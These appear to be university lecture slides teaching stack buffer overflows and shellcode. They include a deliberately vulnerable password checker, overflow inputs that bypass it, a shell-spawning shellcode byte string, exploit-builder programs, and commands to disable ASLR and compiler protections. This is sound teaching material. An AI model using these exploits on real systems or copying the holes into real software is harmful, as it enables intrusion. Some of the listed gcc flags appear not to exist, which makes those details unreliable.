How Computers Get Hacked - Georgia Institute of Technology


Shellcode
Georgia Tech ECE6612
Computer Network Security
Reference: "Hacking: the Art of Exploitation,"
Jon Erickson,
2nd ed., ISBN-13: 978-1-59327-144-2
Reviewed by John Copeland 3/30/14
A computer is exploited ("hacked") if an unauthorized person
gains access to the computer's data and computing resources.
This can be done by:
1. discovering a valid username and password (e.g.,
guessing or social engineering),
2. injecting crafted data into a vulnerable program to
make it do things it should not do (e.g., SQL injection to extract
private data, or cause a "buffer overflow" to alter data),
3. injecting "shell code" into the computer memory, and
then getting the computer to execute that code.
These slides will demo and discuss the second and third
techniques:
1. What is "shellcode".
2. How can it be injected.
3. How can it be run.
These slides will build up a foundation for further study using the book
"Hacking, the Art of Exploitation," ed.2, by Jon Erickson*.
Once techniques are known, defenses are incorporated. The hacker
community then develops new techniques, and the cycle repeats.
The book discusses the technological basis for past exploits, and details
several cycles of hackers versus operating system developers. Neither
the book nor these slides show specific techniques that can be used
against current, updated operating systems. The book does show how to
construct a program for testing another program's susceptibility to buffer
overflows, illustrating how hackers continually find new vulnerabilities.
"Honey Pots" are computers set up to attract attacks so that the newest
exploit code can be studied. The best code today uses sophisticated
encryption and obfuscation techniques to prevent disassembly.
Observing the network activity of an infected computer often does
provide valuable information, especially if the covert channel techniques
being used can be discovered.
*www.nostarchpress.com
Vulnerabilities Fixed in Two Versions of the SeaMonkey Browser (Firefox with Editing)
Fixed in SeaMonkey 2.0.12
MFSA 2011-10 CSRF risk with plugins and 307 redirects
MFSA 2011-08 ParanoidFragmentSink allows javascript: URLs in chrome docs
MFSA 2011-07 Memory corruption during text run construction (Windows)
MFSA 2011-06 Use-after-free error using Web Workers
MFSA 2011-05 Buffer overflow in JavaScript atom map
MFSA 2011-04 Buffer overflow in JavaScript upvarMap
MFSA 2011-03 Use-after-free error in JSON.stringify
MFSA 2011-02 Recursive eval call causes confirm dialogs to evaluate to true
MFSA 2011-01 Miscellaneous memory safety hazards (rv:1.9.2.14/ 1.9.1.17)
Fixed in SeaMonkey 2.0.11
MFSA 2010-84 XSS hazard in multiple character encodings
MFSA 2010-83 Location bar SSL spoofing using network error page
MFSA 2010-82 Incomplete fix for CVE-2010-0179 [see http://cve.mitre.org/cve/]
MFSA 2010-81 Integer overflow vulnerability in NewIdArray
MFSA 2010-80 Use-after-free error with nsDOMAttribute MutationObserver
MFSA 2010-79 Java security bypass from LiveConnect loaded via data: URL refresh
MFSA 2010-78 Add support for OTS font sanitizer
MFSA 2010-77 Crash and remote code execution using HTML tags inside a XUL tree
MFSA 2010-76 Chrome privilege escalation with window.open and <isindex> element
MFSA 2010-75 Buffer overflow while line breaking after document.write with long string
MFSA 2010-74 Miscellaneous memory safety hazards (rv:1.9.2.13/ 1.9.1.16)
The C Programming Language
by Brian W. Kernighan and Dennis M. Ritchie*
Developed along with UNIX in the early 1970s at Bell Labs, Murray Hill, NJ
#include <time.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
char progid[80] = "square_it.c by John Copeland 4/1/2011" ;
int do_square( int x)   // "x" here is a local variable, stored in a different
{                       // location (on the stack) from the "x" in main
  x=x*x;
  return( x ) ;
}
int main(int argc, char * argv[ ])
{
int x, y ; // modern: replace "int" with "int32_t"
char buf[100] ;
printf("\n%s\n", progid ) ;
while(1)
{
printf("\n Type number (q = quit) : ") ;
gets( buf ) ;
if( buf[0] == 'q' ) break ;
x = atoi( buf ) ;
y = do_square( x ) ;
printf(" The square of %d is %d\n", x, y );
}
return( 0 ) ;
}
$ gcc -Wall -o square_it square_it.c
$ ./square_it
square_it.c by John Copeland 4/1/2011
warning: this program uses gets(), which is unsafe.
Type number (q = quit) : 2
The square of 2 is 4
Type number (q = quit) : 3
The square of 3 is 9
Type number (q = quit) : q
$
*Prentice Hall; ed 2 (1988), ISBN-10: 0131103628,ISBN-13: 978-0131103627, $48
Handy reference: http://www.acm.uiuc.edu/webmonkeys/book/c_guide/ (dated 1997 )
Integer and Character Declarations
Old-Style Length in Bits, by CPU Type

Variable Type      DEC PDP-11   Honeywell 6000   IBM 370   Interdata 8/32   32-bit Intel PC, IA32
char                    8              9             8            8                  8
short int              16             36            16           16                 16
int                    16             36            32           32                 32
long int               32             36            32           32                 32
long long int          32             36            32           32                 64
float (double/2)       64             36            32           64                 32

// modern style: "int x ;" can be replaced by "int32_t x ;"
#include <stdint.h>
int32_t x ; uint8_t c ;
C without memory pointers is no C at all
int64_t X, *P, A[10] ;   // int64_t replaces "long long"
char S[100] ;            // string up to 99 chars, S[99] must = 0 (null)

Kept in Symbol Table                          In Executable Program
Name   Type of Variable                       Memory Allocated (bytes)
X      8-byte integer                         200-207, is the value of X
P      4-byte pointer to 8-byte integer       210-213, for memory-address
A      4-byte pointer to 8-byte integer       20-99, for 10 8-byte integers
S      4-byte pointer to 1-byte character     100-199, for 100 1-byte characters (integers)

Equivalents:
X and *( &X ) -also- S[10] and *(S+10)
after P = &X : X and *P and P[0] and *(P + 0 )
"&" means "address of _", * means "value pointed to by _"
How Programs Are Stored in Memory,
and How Subroutine Arguments Are Put on the Stack
Process Memory (from Lowest Address to Highest Address):
  Text or Code Segment
  Data Segment
  BSS Segment (data)
  Heap Segment (grows toward higher addresses)
  Stack Segment (grows toward lower addresses)
Stack Frame (created by a subroutine or function call):
  Return-Value Pointer
  Local Variables (e.g.):
    char buffer[10]
    int flag
  Saved Frame Pointer
  Return Instruction Ptr †
  Subroutine Input Arguments (passed by value)
† An attacker modifies this address to point at shellcode; when done, the
shellcode can return (set the program counter) to the original address.
Erickson pp. 69-75
Subroutine Calls
Program Counter (PC or EIP) values in the Text (Code) Segment:
  main( )
    10000 ->  y = do_square( x )
    10008 ->  printf( … )
  do_square( )
    40000 ->  x=x*x
    40008 ->  return( x )
Data or BSS Segment:
  x: 2
  y: _ -> 4
Stack Frame (on the Stack) for the call with Input Argument 2:
  Buffer, flags
  Return Value Ptr
  Argument x: 2 -> 4
  Saved Frame Pointer
  PC return: 10008
A subroutine call adds memory locations to the top of
the stack, to hold all the local variables and the return
value for the Program Counter (and Stack Pointer).
Strings in C
A string is an array of characters, terminated by a null byte ('\0').
C does not store the length, or maximum length, of a string.
Frequent coding error: forgetting that S below can only hold 9 characters.
char S[10], c='a', T[ ]="predefined", A[3][4]={"yes","no","?"},*P;
Memory: 0000000000apredefined0yes0no00?000PPPP //each char is a byte
Program Line: printf("Results: %c.%s.\n", c, T ) ;
Results:
a.predefined.
Program Line: gets( S ) ; //input from keyboard, note S is a char ptr
User types: "abcdefghijI GOT YOU !"
// > 10 characters
Memory: abcdefghijI GOT YOU !0yes0no00?000PPPP //each char is a byte
Program Line: printf("Results: %c.%s.\n", c,T ) ;
Results:
I. GOT YOU !.
Cure: fgets( S, sizeof(S), stdin) ; // limits input string to 9 characters plus the null byte
We can see that a buffer overflow will mess up data, but how do we
1) put executable code in a string, and 2) execute it?
Erickson pp. 5-114
Stack Buffer-Overflow
// authenticate_me.c should grant access to only "john" or "cope"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int check_auth( char *password) {
  char pw_buffer[16] ;
  int auth_flag = 0 ;
  strcpy( pw_buffer, password ) ;            // string copy (no length check: the vulnerability)
  if( strcmp( pw_buffer, "john" ) == 0 )     // string compare
    auth_flag = 1 ;
  if( strcmp( pw_buffer, "cope" ) == 0 )     // string compare
    auth_flag = 1 ;
  return( auth_flag ) ;
}
int main( int argc, char * argv[ ]) {
  if( argc < 2 ) {                           // a password argument is required
    printf(" Usage: %s <password>\n", argv[ 0 ] ) ;
    return( 1 ) ;
  }
  if( check_auth( argv[ 1 ] ) )              // if return value != 0
    printf(" ### Access Granted ### \n") ;   // for "john" or "cope"
  else
    printf(" ### Access Denied ### \n") ;    // anything else
  return( 0 ) ;
}
Erickson p. 122
Testing "Authenticate_Me"
$ ./authenticate_me john
### Access Granted ###
$ ./authenticate_me cope
### Access Granted ###
$ ./authenticate_me nobody
### Access Denied ###
$ ./authenticate_me xxxxxxxxxxxxxxxx
### Access Granted ###          <- overwriting "auth_flag"
$ ./authenticate_me xxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Segmentation fault              <- overwriting PC return value in the preceding stack frame
Hackers use programs that automatically try all lengths of input to find a length
that does what they want.
Fuzzers
A "Fuzzer" is a program that generates quasi-random data
input to a program to test for unanticipated problems.
For example, putting increasingly long command-line
arguments into "Authenticate-Me" would show a range that
produced segmentation faults, then a range that worked to
get authenticated.
Black-box Fuzzer – produces random input data.
White-box Fuzzer – uses algorithms to increase the code coverage for testing known code.
Shellcode
"Shellcode" is binary code that will execute without being
processed by a "Loader".
1. Must make kernel system calls directly (no standard libraries)
2. Must use absolute or relative jumps (no relocatable jumps)
3. Must be written using assembly language, and with a
limited set of commands (e.g., no labels).
Development can be helped by looking at assembly code
generated by the C compiler, using the gdb debugger.
The original shell code (shown later) starts a shell (e.g.,
/bin/sh) running so that a command prompt is available. If the
vulnerable program is a SUID program (e.g., passwd), then the
shell user is "root." Now "shell code" has come to include any
similar code with other functions (e.g., installing a back door).
Erickson pp. 281-318
Hooking Code
Program Counter (PC or EIP) values in the Text (Code) Segment:
  main( )
    10000 ->  y = do_square( x )
    10008 ->  printf( … )
  do_square( )
    40000 ->  x=x*x
    40008 ->  return( x )
Stack (SP -> top of stack):
  buffer (unused)
  Return Value: 4
  Argument x: 2 -> 4
  Saved Frame Pointer
  PC return: 80000
  Later PC Return
  Input Argument 2
  Previous Stack Frame
Data Overflow to Inject New "PC Return":
  Sled of NOP's
  Shellcode
  Repeated Address (hopefully -> sled)
Shellcode:
  80000 ->  starting instruction
            more instructions
            jump 10008
Exploit code that installs shellcode must:
  Get the PC return value from the Stack for the final "jump" state (or let it crash later).
  Know where the shellcode has been written in memory, to reset the PC return.
The shellcode can reset the stack based on the current SP and SFP values.
Putting Binary Shellcode into a String, on Command Line
// type_shellcode.c
// compile: gcc type_shellcode.c -o type_shellcode
// Output to stdout: a (4 x argv[1])-byte sled, the shellcode, and then argv[2]
// copies of the 4-byte start address given by argv[3-6].
// Example: ./type_shellcode 10 20 191 255 248 92
//   -> 40-byte sled, shellcode, 20 times 0xbffff85c *
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
char shellcode[ ] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"
"\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80"; // 35 bytes + '\x00'
int main(int argc, char * argv[ ]) {
  int i , n ;
  char c[4] ;
  if( argc < 7 ) return( 1 ) ;                 // six arguments are required
  // Build sled
  n = 4 * atoi( argv[ 1 ] ) ;                  // argv[1] = 10, so n = 40
  for(i = 0; i < n ; i++) printf("%c",'\x90'); // build sled of NOPs
  // Print shellcode
  printf("%s", shellcode ) ;
  // Build block of return addresses
  c[0]=atoi(argv[3]); c[1]=atoi(argv[4]);      // 191 255 = hex bf ff
  c[2]=atoi(argv[5]); c[3]=atoi(argv[6]);      // 248 92 = hex f8 5c
  n = atoi( argv[ 2 ] ) ;                      // n = 20
  for(i = 0; i < n ; i++)
    printf("%c%c%c%c", c[0],c[1],c[2],c[3]);   // start addresses
  return( 0 ) ;
}
Usage: $ ./authenticate_me $(./type_shellcode 10 20 191 255 248 92)
// To run, you must use gdb to find the right value of the starting address.
// The bash shell expands $( ./x ) to the output of program ./x
// *This is for a G4 CPU. For an Intel CPU, reverse the order of address-byte integers.
To see where pw_buffer is stored, add a line:
printf(" ======= &pw_buffer = %x = %u\n",
       (unsigned int) &pw_buffer, (unsigned int) &pw_buffer ) ;
and comment out other printf() lines:
$./authenticate_me john
======= &pw_buffer = bfe27540 = 3,219,289,408
$./authenticate_me john
======= &pw_buffer = bfecb010 = 3,219,959,824
$./authenticate_me john
======= &pw_buffer = bfe35480 = 3,219,346,560
$./authenticate_me john
======= &pw_buffer = bfe7b720 = 3,219,633,952
$./authenticate_me john
======= &pw_buffer = bff71840 = 3,220,641,856
$./authenticate_me john
======= &pw_buffer = bff96ad0 = 3,220,794,064
$./authenticate_me john
======= &pw_buffer = bffeaab0 = 3,221,138,096
Address space layout randomization (ASLR)
Stack Overflow Injection is now difficult because the address of the stack
frame varied over a range of about 2,000,000 bytes each time the modified
program was run.
It only needs to work once. By automatically trying up to a million times,
a single hit is probable, and that can install a back door to root
(see pp. 384-391).
Run a program with execle() to limit the Environment. Put the
shellcode into the only Environment string, env[0]. The overflow
string (buffer) only has to have the starting address (ret),
repeated many times.*
// execle_run.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>
int main(int argc, char *argv[ ]) {
char *env[2] = {"\x31\xc0\x31 … \xcd\x80", NULL}; // last entry must be NULL
uint32_t i, ret = 0xbffffffa; // address of env[0] in "authenticate_me"
char buffer[161] ;
for(i=0;i<160;i+=4)
*( (uint32_t*) (buffer+i) ) = ret ; // put in 4-byte address
buffer[160] = 0 ;
execle("./authenticate_me", "authenticate_me", buffer, NULL, env );
return( 0 ) ;
}
* Erickson pp. 149-150
** With today's (2011) Linux, "ret" has to match a different value
on each run, even when execle() is used.
Buffer overflows can be used to:
Alter data later used in control statements.
Input data and control data on stack.
Inject shellcode and cause it to be executed.
Basic problem:
Input data and Program-Counter return values
are kept on the stack.
PC can point to a stack address.
Other types of overflows:
Stack segment overflow (p. 150)
Function pointer overflow (p. 156)
Printf format strings (p. 171):
  Examine stack values
  Read arbitrary values from memory
  Write arbitrary values to memory
Present-day C compilers (gcc) and Linux are designed to defeat most of the techniques
discussed in "Hacking, the Art of Exploitation".
For those of you who would like to experiment with code that has vulnerabilities, you can
turn some of these protections off in the OS, and in the gcc compiler:
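*** To disable ASLR (Address Space Layout Randomization): this change is immediate on
the running OS kernel (run with root privileges). Note that "sudo echo 0 > file" fails,
because the redirection is done by the unprivileged shell; use tee instead:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
(when done, restore the earlier value, typically 2 on current kernels:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space)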
*** To turn off gcc protections when you compile your program, use options
-fno-stack-protector       this will disable canaries
-fno-stack-protector-all
-fno-address-sanitizer     turns off AddressSanitizer, a memory error detector
-fno-memsafety
-z execstack               this will make the stack executable (disables
                           non-executable stack protection)
-fno-mudflap               this will disable protections for risky pointer
                           operations that may be used in overflows, so that
                           runtime memory access errors are not caught
Example gcc compile:
> gcc -g -fno-stack-protector -z execstack -Wall -o program program.c
-Wall shows all warnings, always good to have,
-g so you can use gdb to show C code lines and variable locations.
Information provided by Dr. Selcuk Uluagac, GT ECE (now at Fla. International U.)
Networking, Chapter 4
Concise explanation of sockets, protocol stack, formats, …
Simple code for:
Server program (p.204)
Web Server program (p.213)
Network traffic sniffing (p.224)
Source code for Nemesis (arp spoofing, p.245)
SYN flood, Ping of Death, Ping Flood, …
TCP/IP hijacking (p.258)
Port scanning (p.264)
Pro-active defense (p.267)
Port-binding shellcode (p.278)
Shellcode, Chapter 5
Using ASM to write assembly code (p.281)
Linux system calls (p.283)
Investigating with gdb (p.289)
Removing null bytes (p.290)
Shell-spawning shellcode (the original, p.295)
Port-binding shellcode (for backdoors, p.303)
Connect-back shellcode (defeat firewalls, p.314)
Counter Measures, Chapter 6
Counter measures that detect intrusion (p.320)
Log files (p.334)
Rootkit techniques (p.348)
Socket reuse (p.355)
Payload smuggling (hiding signatures, p.359)
Polymorphic Printable ASCII shellcode (p.366)
Non-executable stack (available, not used, p.376)
Randomized stack space (seen earlier, p.379)
Defeating above (p.388)
Cryptology, Chapter 7
Basics (p.393)
Symmetric encryption (p.398)
Asymmetric encryption (p.400)
Hybrid Ciphers (man-in-the-middle attacks, p.406)
SSH attacks
Password Cracking (p.418)
Dictionary attacks, Rainbow Tables
Wireless 802.11b WiFi encryption (p.436)
WPA attacks - not covered
Conclusion, Chapter 8 (pp. 452-453)